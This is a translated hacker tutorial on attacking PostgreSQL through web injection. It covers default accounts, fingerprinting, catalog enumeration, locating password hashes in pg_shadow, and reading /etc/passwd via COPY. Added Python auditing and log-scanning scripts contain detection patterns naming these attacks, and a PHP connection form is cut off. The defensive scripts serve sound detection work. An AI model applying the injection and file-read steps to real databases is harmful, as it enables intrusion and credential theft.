Killer www.ydteam.com
This paper could have been born earlier. I accidentally lost some of the notes I had taken while reading the PostgreSQL manual, so it did not appear for a long time. Today I am free to write down a little of what I remember; I hope it will be helpful for the web-side hacking of PostgreSQL databases, ^_^.
I. Introduction
PostgreSQL is a powerful open-source relational database system. After more than 15 years of development, it has earned an excellent reputation for reliability, data integrity, and correctness. It runs on all major operating systems, including Linux, UNIX (AIX, BSD, HP-UX, SGI IRIX, Mac OS X, Solaris, Tru64) and Windows. It fully complies with the ACID principles and fully supports foreign keys, joins, views, triggers, and stored procedures (in multiple languages). It contains most of the data types of SQL92 and SQL99, including INTEGER, NUMERIC, BOOLEAN, CHAR, VARCHAR, DATE, INTERVAL, and TIMESTAMP. It also supports storing binary large objects, including images, sounds, and video. It has native programming interfaces for C/C++, Java, .NET, Perl, Python, Ruby, Tcl, and ODBC. PostgreSQL prides itself on standards conformance: it implements the ANSI SQL 92/99 standards. It fully supports subqueries (including subselects in the FROM clause) and the read-committed and serializable transaction isolation levels. PostgreSQL has a fully relational system catalog that supports multiple schemas per database, and its catalog can also be accessed through the standard SQL Information Schema. Data integrity features include (composite) primary keys, foreign keys with restrict and cascade update/delete, CHECK constraints, UNIQUE constraints, and NOT NULL constraints. It also has many extensions and advanced features: columns whose values are assigned automatically in sequence, and partial result sets returned via LIMIT/OFFSET. PostgreSQL supports compound, unique, partial, and functional indexes, using B-tree, R-tree, hash, or any of the GiST storage methods.
II. Installation
1. Windows: download the Windows installation package from the official website (http://www.postgresql.org); the latest version is 8.3. Note that when PostgreSQL is installed it adds a postgres user to the system's user accounts, and that PostgreSQL on Windows enforces something like a password policy: the password you set is subject to complexity and length restrictions. After installation you need to add ../PostgreSQL/bin to the system environment variables. You can then run psql directly (the counterpart of mysql.exe in MySQL on Windows).
2. *nix: download the corresponding installation package from the official website, or install online. The installation process shows no step for setting a password; the default password is empty, and when using psql you first need to switch to the postgres user.
III. Basic syntax
Since the database naturally follows the SQL language, create, insert, update and so on work as usual (PostgreSQL's own dialect is called PL/pgSQL). A database has far too much syntax to cover clearly here, so let's only talk about the few pieces that are useful to us.
1. Comments, statement terminator, concatenation operator
A. Since PostgreSQL follows the SQL language, it naturally supports -- comments;
B. PostgreSQL supports /* ... */ comments, like MySQL;
C. When using psql against a PostgreSQL database, add ; (semicolon) or \g after the command to mark the end of the statement and execute the query.
D. PostgreSQL uses || to concatenate strings. Be careful: the | character may be escaped.
2. Automatic type conversion
PostgreSQL does not automatically convert field types the way MySQL does; in this respect it resembles Oracle. So pay attention to this when injecting; union queries are supported by default.
3. Connecting to PostgreSQL
By default, external connections are not allowed. To manage a PostgreSQL database remotely, you need to modify ../PostgreSQL/data/pg_hba.conf; see the PostgreSQL manual. The default superuser is postgres (like root in MySQL), the default port is 5432, and the default system database is postgres.
Use psql -h ip -d dbname -p port -U username. Note that the -U parameter is upper case. With a default local installation, running psql -U postgres directly prompts you for the password; after you enter it correctly, the postgres=# prompt appears (like mysql> in MySQL) and psql can be used normally.
\? shows help on psql commands
\h shows help on SQL commands
\q quits
\l lists all databases in the system
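The article leaves the pg_hba.conf change to the manual. As an added example (my own code, not from the article or from the PostgreSQL project), the script below parses a constructed pg_hba.conf and flags the entries a defender should never ship when opening the server to remote management: trust over the network, the cleartext password method, and rules whose address column matches every client. The file format follows the PostgreSQL documentation; the sample file, the rule names and the severity labels are my assumptions.

```python
"""Audit pg_hba.conf for overly permissive client-authentication rules.

Added example: parses the documented pg_hba.conf layout and reports entries
that expose the server. SAMPLE_PG_HBA is constructed for this demo.
"""
import ipaddress
from collections import namedtuple

Entry = namedtuple("Entry", "line kind database user address method")

# Authentication methods accepted in pg_hba.conf; used to tell a separate
# netmask column apart from the method column.
METHODS = {"trust", "reject", "md5", "password", "scram-sha-256", "gss", "sspi",
           "ident", "peer", "pam", "ldap", "radius", "cert", "krb5", "crypt"}

# Constructed sample: lines 4, 5 and 7 are the weak settings, lines 3 and 6
# their corrected counterparts (narrow address, hashed password exchange).
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS              METHOD
local   all       all                        trust
host    all       all   127.0.0.1/32         md5
host    all       all   0.0.0.0/0            trust
host    app       app   10.0.0.0 255.0.0.0   password
host    app       app   10.0.1.5/32          md5
host    all       all   ::/0                 md5
"""


def parse_pg_hba(text):
    """Yield an Entry for each non-comment, non-blank line."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        kind = parts[0]
        if kind == "local":
            # local (Unix-socket) lines have no address column
            yield Entry(lineno, kind, parts[1], parts[2], None, parts[3])
            continue
        address, idx = parts[3], 4
        # "IP netmask" form: the 5th column is a mask and the 6th the method
        if parts[4] not in METHODS and len(parts) > 5 and parts[5] in METHODS:
            address, idx = f"{parts[3]}/{parts[4]}", 5
        yield Entry(lineno, kind, parts[1], parts[2], address, parts[idx])


def matches_any_host(address):
    """True when the address column admits every client address."""
    if address == "all":
        return True
    try:
        return ipaddress.ip_network(address, strict=False).prefixlen == 0
    except ValueError:  # hostname, samehost, samenet: not a wildcard
        return False


def audit_pg_hba(text):
    """Return (line, severity, reason) tuples for risky entries."""
    findings = []
    for e in parse_pg_hba(text):
        if e.method == "trust":
            if e.kind == "local":
                findings.append((e.line, "medium",
                                 "trust on local socket: any OS account connects as any DB role"))
            else:
                findings.append((e.line, "high",
                                 "trust over the network: no password required"))
        elif e.method == "password":
            findings.append((e.line, "high", "cleartext password authentication"))
        if e.kind != "local" and matches_any_host(e.address):
            findings.append((e.line, "high",
                             f"rule for {e.database}/{e.user} matches every source address"))
    return findings


if __name__ == "__main__":
    for line, severity, reason in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"line {line}: [{severity}] {reason}")
```

Run it against a real file with `audit_pg_hba(open("/path/to/pg_hba.conf").read())`. The corrected form of a remote-management rule is the shape of sample lines 3 and 6: the narrowest address range that still reaches the admin host, and a hashed method (md5 on the 8.x releases the article covers; scram-sha-256 on current releases).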
4. pgAdmin III and phpPgAdmin
A. pgAdmin III is the graphical database management program provided with PostgreSQL. It can browse all the fields, functions, sequences, table structures and related attributes, trigger functions, and views in a PostgreSQL database.
B. phpPgAdmin is the namesake of MySQL's phpMyAdmin: a web-based database management program written in PHP. Anyone who has used phpMyAdmin knows how powerful it is; phpPgAdmin is equally powerful for PostgreSQL databases.
IV. PostgreSQL injection
Since PostgreSQL is an RDBMS, the structure of every database in the system is stored in the system catalog, so injection is relatively convenient.
Since the comment syntax is the same as MySQL's, how do we determine which database we are dealing with? I have no standard answer for this. I think you can scan port 5432 (though the web server and database may be separated), use the result returned by the version() function, or use queries such as select * from pg_class / select * from pg_group to determine the database type. The PostgreSQL catalog also contains information_schema, but I have not had a PostgreSQL injection point to test against.
So I cannot say whether select schema_name from information_schema.schemata can be used to determine whether information_schema is available. Sorry, I only thought of using information_schema; if you have the conditions, verify it.
The following describes the built-in PostgreSQL functions, tables, and views that are useful during an intrusion:
current_database() current database name
session_user session user
current_user user name in the current execution environment (these three functions can be called without the parentheses)
user same as session_user
inet_client_port() remote port
cast(sourcetype AS targettype) explicit type conversion
current_setting(setting_name) obtains the current value of setting_name, as a query
convert() encoding conversion
pg_stat_user_tables a view holding the names of all tables in the system; the key field is relname. select relname from pg_stat_user_tables limit 1 offset N reads the table names one by one.
The pg_stat_all_tables view serves the same purpose.
pg_shadow: do you think of /etc/shadow when you see "shadow"? This table contains information about database users, including the key fields usename, passwd, and usesuper; however, this table is protected by permissions.
pg_user has the same structure as pg_shadow but is readable by everyone; its passwd field may be blanked out or encrypted.
pg_group defines the groups and which users belong to each group; the key field is groname.
information_schema.columns holds all columns of the catalog objects; the key field is column_name. select column_name from information_schema.columns where table_name = 'tablename' limit 1 offset N reads the columns of each table one by one.
5. Reading files
First create a table, copy the file contents into the table, then read the table contents.
create table read (line text);
copy read from '/etc/passwd'; alter table read add id serial --
select * from read;
drop table read;
That is the way of thinking; use it as you like (encode it, ^_^).
PostgreSQL 8.2 and later added pg_file_read(text, text, bool) and pg_file_write(text, text, bool). You should be able to tell from the names what they do; explore them on your own!
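Both the catalog walk with limit 1 offset N from the function/view list and the COPY ... FROM file trick above leave a recognisable trail in the server log once log_statement = 'all' is enabled. As an added example (my own code, not the article's), the scanner below parses constructed log lines written with an assumed log_line_prefix of '%m [%p] %u@%d ', tags statements that touch pg_shadow/pg_user/pg_group/information_schema.columns, read files through COPY or pg_read_file-style functions, or probe with UNION ... version(), and adds a separate catalog_enumeration tag once the same user@database has stepped through a catalog view with three offset-incremented queries. The rule names, the threshold and the sample lines are my assumptions.

```python
"""Tag suspicious statements in PostgreSQL statement logs.

Added example. Assumes log_statement = 'all' and the log_line_prefix
'%m [%p] %u@%d '. SAMPLE_LOG is constructed for this demo.
"""
import re
from collections import Counter

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:  statement: (?P<sql>.*)$")

# Each rule: (tag, pattern). Tags are this example's own vocabulary.
RULES = [
    ("catalog_probe", re.compile(
        r"\b(pg_shadow|pg_user|pg_group|pg_stat_(user|all)_tables|"
        r"information_schema\.columns)\b", re.I)),
    ("file_access", re.compile(
        r"\bcopy\s+\S+\s+from\s+'|\bpg_(read_file|file_read|file_write)\s*\(", re.I)),
    ("union_probe", re.compile(
        r"\bunion\b.*\b(version|current_user|current_database|session_user)\b", re.I)),
    ("comment_tail", re.compile(r"--\s*$|/\*.*?\*/\s*$")),
]
# limit 1 offset N is the row-by-row walk used to enumerate a catalog view.
OFFSET_RE = re.compile(r"\blimit\s+1\s+offset\s+\d+", re.I)

SAMPLE_LOG = [
    "2024-01-01 10:00:01 UTC [4211] app@webdb LOG:  statement: select id, title from posts where id = 7",
    "2024-01-01 10:00:02 UTC [4211] app@webdb LOG:  statement: select id, title from posts where id = 7 union select 1, version()--",
    "2024-01-01 10:00:03 UTC [4211] app@webdb LOG:  statement: select relname from pg_stat_user_tables limit 1 offset 0",
    "2024-01-01 10:00:04 UTC [4211] app@webdb LOG:  statement: select relname from pg_stat_user_tables limit 1 offset 1",
    "2024-01-01 10:00:05 UTC [4211] app@webdb LOG:  statement: select relname from pg_stat_user_tables limit 1 offset 2",
    "2024-01-01 10:00:06 UTC [4211] app@webdb LOG:  statement: select usename, passwd from pg_shadow",
    "2024-01-01 10:00:07 UTC [4211] app@webdb LOG:  statement: copy read from '/etc/passwd'",
    "2024-01-01 10:00:08 UTC [4211] app@webdb LOG:  statement: select pg_read_file('/etc/passwd')",
    "2024-01-01 10:00:09 UTC [4211] app@webdb LOG:  statement: update posts set title = 'hello' where id = 7",
]


def parse_line(line):
    """Split one log line into its prefix fields and the SQL text, or None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(sql):
    """Return the tags whose pattern matches this statement, in RULES order."""
    return [tag for tag, rx in RULES if rx.search(sql)]


def scan_log(lines, enumeration_threshold=3):
    """Return (line_number, user, tags) for every tagged statement.

    Lines that do not match the assumed prefix are skipped. The enumeration
    tag fires on the Nth offset-stepped catalog query from one user@db.
    """
    findings = []
    offset_hits = Counter()
    for lineno, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["sql"])
        if "catalog_probe" in tags and OFFSET_RE.search(rec["sql"]):
            key = (rec["user"], rec["db"])
            offset_hits[key] += 1
            if offset_hits[key] == enumeration_threshold:
                tags.append("catalog_enumeration")
        if tags:
            findings.append((lineno, rec["user"], tags))
    return findings


if __name__ == "__main__":
    for lineno, user, tags in scan_log(SAMPLE_LOG):
        print(f"line {lineno} ({user}): {', '.join(tags)}")
```

The comment_tail tag is deliberately low confidence on its own (trailing comments occur in legitimate SQL); what makes line 2 interesting is its combination with union_probe, and what makes lines 3 to 5 interesting is the count. In practice, feed `scan_log` the statement log of the application's own database role: that role has no business reading pg_shadow or running COPY from a server-side path, and the catalog views should be closed to it anyway.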
<?php
if (empty($_GET['action']))
{
?>
<form action="?action=connect" method="POST">
<table>
<tr><td>pghost:</td><td><input type="text" name="pghost" size="30" value="127.0.0.1"></td></tr>
<tr><td>pgport:</td><td><input type="text" name="pgport" size="30" value="5432"></td></tr>
<tr><td>dbname:</td><td><input type="text" name="pgdbname" size="30" value="s"></td></tr>
<tr><td>username:</td><td><input type="text" name="pgusername" size="30" value="s"></td></tr>
<tr><td>password:</td><td><input type="text" name="pgpassword" size="30" value=""></td></tr>
<tr><td></td><td><input type="submit" name="submit" value="connect"><input type="re